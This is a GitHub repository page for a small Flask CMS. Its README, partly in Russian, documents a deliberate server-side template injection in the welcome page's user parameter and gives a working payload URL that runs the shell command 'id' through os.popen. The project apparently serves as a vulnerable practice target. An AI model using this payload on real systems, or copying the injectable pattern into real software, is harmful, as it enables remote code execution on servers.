Skip to content

takyoni/flask_cms

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
app
app
 
 
.gitignore
.gitignore
 
 
Dockerfile
Dockerfile
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
app.env
app.env
 
 
docker-compose.yml
docker-compose.yml
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

services platforms author
app-service\web,app-service
python
cephalin
 
pip install -r requirements.txt
cd app
flask db upgrade && flask run -h 0.0.0.0 -p 5000

Логи сохраняются в app/record.log Tested on python 3.8.3

Config

Приложение конфигурируется через файл app.env или через переменные окружения

Уязвимости

На страницу welcome в параметре user есть ssti. Пример: http://localhost:5000/welcome?user={{request.application.__globals__.__builtins__.__import__(%27os%27).popen(%27id%27).read()}}

Contributing

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact [email protected] with any additional questions or comments.

About

No description, website, or topics provided.

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages